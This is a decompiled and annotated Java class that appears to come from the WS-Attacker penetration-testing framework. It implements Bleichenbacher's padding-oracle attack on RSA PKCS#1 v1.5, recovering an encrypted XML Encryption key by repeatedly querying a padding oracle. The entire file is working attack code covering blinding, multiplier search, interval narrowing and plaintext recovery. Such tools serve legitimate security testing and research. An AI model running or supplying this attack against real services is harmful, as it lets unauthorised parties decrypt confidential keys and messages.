/*
 * Decompiled with CFR 0.152.
 */
package wsattacker.library.xmlencryptionattack.attackengine.attacker.pkcs1;

import java.math.BigInteger;
import java.security.interfaces.RSAPublicKey;
import java.util.ArrayList;
import org.apache.log4j.Logger;
import wsattacker.library.xmlencryptionattack.attackengine.CryptoAttackException;
import wsattacker.library.xmlencryptionattack.attackengine.Utility;
import wsattacker.library.xmlencryptionattack.attackengine.attackbase.CCAAttack;
import wsattacker.library.xmlencryptionattack.attackengine.attacker.pkcs1.AttackerUtility;
import wsattacker.library.xmlencryptionattack.attackengine.attacker.pkcs1.Interval;
import wsattacker.library.xmlencryptionattack.attackengine.oracle.base.AOracle;
import wsattacker.library.xmlencryptionattack.attackengine.oracle.base.request.PKCS1OracleRequest;
import wsattacker.library.xmlencryptionattack.attackengine.oracle.base.response.OracleResponse;
import wsattacker.library.xmlencryptionattack.util.XMLEncryptionConstants;

public class BleichenbacherAttacker
extends CCAAttack {
    private final byte[] encryptedKey;
    protected final RSAPublicKey publicKey;
    /** Ciphertext c0 = c * s0^e mod n from which every step-2 query is derived. */
    private BigInteger c0;
    /** Blinding factor s0; the interval value is multiplied by s0^-1 mod n in step 4. */
    private BigInteger s0;
    /** Current multiplier s_i of the search. */
    protected BigInteger si;
    /** Current set M_i of candidate intervals for the (blinded) plaintext. */
    private Interval[] m;
    /** Length k of the modulus in whole bytes, i.e. ceil(bitLength / 8). */
    protected final int blockSize;
    /** B = 2^(8(k-2)); the initial interval is [2B, 3B - 1]. */
    private final BigInteger bigB;
    private final boolean msgIsPKCS;
    private byte[] result;
    static Logger LOG = Logger.getLogger(BleichenbacherAttacker.class);

    /**
     * Creates an attacker that treats {@code encryptedKey} as already PKCS#1 conforming,
     * so the blinding step is skipped.
     *
     * @param encryptedKey the RSA ciphertext to attack (defensively copied)
     * @param pkcsOracle   the oracle to query; also supplies the RSA public key
     * @throws CryptoAttackException declared for backward compatibility only
     */
    public BleichenbacherAttacker(byte[] encryptedKey, AOracle pkcsOracle) throws CryptoAttackException {
        this(encryptedKey, pkcsOracle, true);
    }

    /**
     * Creates an attacker for {@code encryptedKey}.
     *
     * @param encryptedKey   the RSA ciphertext to attack (defensively copied)
     * @param pkcsOracle     the oracle to query; also supplies the RSA public key
     * @param msgPKCScofnorm {@code true} to skip blinding (s0 = 1, c0 = ciphertext);
     *                       {@code false} to search for a blinding factor first
     */
    public BleichenbacherAttacker(byte[] encryptedKey, AOracle pkcsOracle, boolean msgPKCScofnorm) {
        this.m_CryptoTechnique = XMLEncryptionConstants.CryptoTechnique.ASYMMETRIC;
        this.encryptedKey = encryptedKey.clone();
        this.publicKey = pkcsOracle.getPublicKey();
        this.m_Oracle = pkcsOracle;
        this.msgIsPKCS = msgPKCScofnorm;
        this.c0 = BigInteger.ZERO;
        this.si = BigInteger.ZERO;
        this.m = null;
        // k must be rounded UP to whole bytes. A floor division here produced a block size
        // one byte too small for moduli whose bit length is not a multiple of 8, and it
        // disagreed with the (rounded-up) byte count used to derive B.
        int modulusBytes = (this.publicKey.getModulus().bitLength() + 7) / 8;
        this.blockSize = modulusBytes;
        this.bigB = BigInteger.valueOf(2L).pow((modulusBytes - 2) * 8);
        LOG.info("B computed: " + this.bigB.toString(16));
        LOG.info("Blocksize: " + this.blockSize + " bytes");
    }

    /**
     * Runs the attack until a single candidate plaintext remains.
     *
     * @return the recovered plaintext as produced by {@link BigInteger#toByteArray()}, so any
     *         leading zero bytes of the padded message are not included
     * @throws CryptoAttackException if a step that queries the oracle fails
     * @throws IllegalStateException if narrowing leaves no candidate interval, which means
     *         the oracle answers were inconsistent and the attack cannot converge
     */
    @Override
    public byte[] executeAttack() throws CryptoAttackException {
        LOG.info("Step 1: Blinding");
        if (this.msgIsPKCS) {
            LOG.info("Step skipped --> Message is considered as PKCS compliant.");
            this.s0 = BigInteger.ONE;
            this.c0 = new BigInteger(1, this.encryptedKey);
            this.m = this.initialIntervals();
        } else {
            this.stepOne();
        }
        int i = 1;
        boolean solutionFound = false;
        while (!solutionFound) {
            LOG.info("Step 2: Searching for PKCS conforming messages.");
            this.stepTwo(i);
            LOG.info("Step 3: Narrowing the set of soultions.");
            this.stepThree(i);
            LOG.info("Step 4: Computing the solution.");
            solutionFound = this.stepFour(i);
            ++i;
            LOG.info("// Total # of queries so far: " + this.m_Oracle.getNumberOfQueries());
        }
        return this.result;
    }

    /** Step 1: tries s = 1, 2, ... until c * s^e mod n is accepted, then uses it as c0. */
    private void stepOne() throws CryptoAttackException {
        BigInteger ciphered = new BigInteger(1, this.encryptedKey);
        byte[] send;
        do {
            this.si = this.si.add(BigInteger.ONE);
            send = this.prepareMsg(ciphered, this.si);
        } while (!this.oracleAcceptsCiphertext(send));
        this.c0 = new BigInteger(1, send);
        this.s0 = this.si;
        this.m = this.initialIntervals();
        LOG.info(" Found s0 : " + this.si);
    }

    /** Step 2: chooses the search strategy for the next conforming multiplier s_i. */
    private void stepTwo(int i) throws CryptoAttackException {
        if (i == 1) {
            this.stepTwoA();
        } else if (this.m.length >= 2) {
            this.stepTwoB();
        } else if (this.m.length == 1) {
            this.stepTwoC();
        }
        LOG.info(" Found s" + i + ": " + this.si);
    }

    /** Step 2a: linear search for s_1 starting at ceil(n / 3B). */
    private void stepTwoA() throws CryptoAttackException {
        BigInteger n = this.publicKey.getModulus();
        LOG.info("Step 2a: Starting the search");
        // Position one below the first candidate; the search increments before querying.
        this.si = ceilDivide(n, BigInteger.valueOf(3L).multiply(this.bigB)).subtract(BigInteger.ONE);
        this.incrementSiUntilConforming();
    }

    /** Step 2b: linear search for the next s_i above s_{i-1}. */
    private void stepTwoB() throws CryptoAttackException {
        LOG.info("Step 2b: Searching with more than one interval left");
        this.incrementSiUntilConforming();
    }

    /** Step 2c: searches s_i over the (r_i, s_i) ranges derived from the single interval [a, b]. */
    private void stepTwoC() throws CryptoAttackException {
        BigInteger n = this.publicKey.getModulus();
        LOG.info("Step 2c: Searching with one interval left");
        Interval interval = this.m[0];
        // r_i starts at floor(2 * (b * s_{i-1} - 2B) / n).
        BigInteger ri = this.si.multiply(interval.upper)
                .subtract(BigInteger.valueOf(2L).multiply(this.bigB))
                .multiply(BigInteger.valueOf(2L))
                .divide(n);
        BigInteger upperBound = this.step2cComputeUpperBound(ri, n, interval.lower);
        this.si = this.step2cComputeLowerBound(ri, n, interval.upper).subtract(BigInteger.ONE);
        do {
            this.si = this.si.add(BigInteger.ONE);
            if (this.si.compareTo(upperBound) > 0) {
                // All candidates for this r_i were rejected: move on to r_i + 1.
                ri = ri.add(BigInteger.ONE);
                upperBound = this.step2cComputeUpperBound(ri, n, interval.lower);
                this.si = this.step2cComputeLowerBound(ri, n, interval.upper);
            }
        } while (!this.oracleAcceptsCiphertext(this.prepareMsg(this.c0, this.si)));
    }

    /**
     * Step 3: narrows every interval [a, b] of M_{i-1} using the new s_i. For each admissible r,
     * it keeps [max(a, ceil((2B + rn) / s_i)), min(b, floor((3B - 1 + rn) / s_i))] if non-empty.
     *
     * @throws IllegalStateException if no interval survives; the loop in executeAttack would
     *         otherwise spin forever without making progress
     */
    private void stepThree(int i) {
        BigInteger n = this.publicKey.getModulus();
        BigInteger twoB = BigInteger.valueOf(2L).multiply(this.bigB);
        BigInteger threeBMinusOne = BigInteger.valueOf(3L).multiply(this.bigB).subtract(BigInteger.ONE);
        ArrayList<Interval> ms = new ArrayList<Interval>(15);
        for (Interval interval : this.m) {
            BigInteger rMax = this.step3ComputeUpperBound(this.si, n, interval.upper);
            for (BigInteger r = this.step3ComputeLowerBound(this.si, n, interval.lower);
                    r.compareTo(rMax) <= 0;
                    r = r.add(BigInteger.ONE)) {
                BigInteger rn = r.multiply(n);
                BigInteger newLower = ceilDivide(twoB.add(rn), this.si);
                if (interval.lower.compareTo(newLower) > 0) {
                    newLower = interval.lower;
                }
                BigInteger newUpper = threeBMinusOne.add(rn).divide(this.si);
                if (interval.upper.compareTo(newUpper) < 0) {
                    newUpper = interval.upper;
                }
                if (newLower.compareTo(newUpper) <= 0) {
                    ms.add(new Interval(newLower, newUpper));
                }
            }
        }
        LOG.info(" # of intervals for M" + i + ": " + ms.size());
        if (ms.isEmpty()) {
            throw new IllegalStateException("No interval left for M" + i
                    + "; the oracle answers are inconsistent and the attack cannot converge.");
        }
        this.m = ms.toArray(new Interval[ms.size()]);
    }

    /**
     * Step 4: if exactly one single-value interval {a} remains, stores s0^-1 * a mod n as the
     * result.
     *
     * @return {@code true} if a solution was stored
     */
    private boolean stepFour(int i) {
        if (this.m.length != 1 || this.m[0].lower.compareTo(this.m[0].upper) != 0) {
            return false;
        }
        BigInteger n = this.publicKey.getModulus();
        BigInteger solution = this.s0.modInverse(n).multiply(this.m[0].upper).mod(n);
        // toByteArray() is the minimal two's-complement encoding, so it is not padded to blockSize.
        this.result = solution.toByteArray();
        LOG.info("====> Solution found!\n" + Utility.bytesToHex(this.result));
        return true;
    }

    /** Step 3 upper bound for r: ceil((b * s - 2B) / n). */
    private BigInteger step3ComputeUpperBound(BigInteger s, BigInteger modulus, BigInteger upperIntervalBound) {
        BigInteger numerator = upperIntervalBound.multiply(s).subtract(BigInteger.valueOf(2L).multiply(this.bigB));
        return ceilDivide(numerator, modulus);
    }

    /** Step 3 lower bound for r: floor((a * s - 3B + 1) / n). */
    private BigInteger step3ComputeLowerBound(BigInteger s, BigInteger modulus, BigInteger lowerIntervalBound) {
        return lowerIntervalBound.multiply(s)
                .subtract(BigInteger.valueOf(3L).multiply(this.bigB))
                .add(BigInteger.ONE)
                .divide(modulus);
    }

    /** Step 2c lower bound for s: floor((2B + r * n) / b). */
    private BigInteger step2cComputeLowerBound(BigInteger r, BigInteger modulus, BigInteger upperIntervalBound) {
        return BigInteger.valueOf(2L).multiply(this.bigB).add(r.multiply(modulus)).divide(upperIntervalBound);
    }

    /** Step 2c upper bound for s: floor((3B + r * n) / a). */
    private BigInteger step2cComputeUpperBound(BigInteger r, BigInteger modulus, BigInteger lowerIntervalBound) {
        return BigInteger.valueOf(3L).multiply(this.bigB).add(r.multiply(modulus)).divide(lowerIntervalBound);
    }

    /** Increments {@link #si} until the oracle accepts c0 * si^e mod n. */
    private void incrementSiUntilConforming() throws CryptoAttackException {
        do {
            this.si = this.si.add(BigInteger.ONE);
        } while (!this.oracleAcceptsCiphertext(this.prepareMsg(this.c0, this.si)));
    }

    /** Sends one ciphertext to the oracle and reports whether the answer was VALID. */
    private boolean oracleAcceptsCiphertext(byte[] ciphertext) throws CryptoAttackException {
        OracleResponse response = this.m_Oracle.queryOracle(new PKCS1OracleRequest(ciphertext));
        return response.getResult() == OracleResponse.Result.VALID;
    }

    /** Returns the initial interval set { [2B, 3B - 1] }. */
    private Interval[] initialIntervals() {
        return new Interval[]{new Interval(
                BigInteger.valueOf(2L).multiply(this.bigB),
                BigInteger.valueOf(3L).multiply(this.bigB).subtract(BigInteger.ONE))};
    }

    /**
     * Returns the quotient plus one when the division leaves a remainder. For a non-negative
     * dividend and a positive divisor this is the ceiling of dividend / divisor.
     */
    private static BigInteger ceilDivide(BigInteger dividend, BigInteger divisor) {
        BigInteger[] quotientAndRemainder = dividend.divideAndRemainder(divisor);
        return quotientAndRemainder[1].signum() != 0
                ? quotientAndRemainder[0].add(BigInteger.ONE)
                : quotientAndRemainder[0];
    }

    /**
     * Computes originalMessage * si^e mod n and sizes it to {@link #blockSize} bytes via
     * {@code AttackerUtility.correctSize}. Logs the query count whenever it is a multiple of 100.
     *
     * @param originalMessage the ciphertext to multiply, as an unsigned integer
     * @param si              the multiplier s
     * @return the encoded ciphertext to send to the oracle
     */
    protected byte[] prepareMsg(BigInteger originalMessage, BigInteger si) {
        if (this.m_Oracle.getNumberOfQueries() % 100L == 0L) {
            LOG.info("# of queries so far: " + this.m_Oracle.getNumberOfQueries());
        }
        BigInteger n = this.publicKey.getModulus();
        BigInteger blinded = originalMessage.multiply(si.modPow(this.publicKey.getPublicExponent(), n)).mod(n);
        return AttackerUtility.correctSize(blinded.toByteArray(), this.blockSize, true);
    }
}

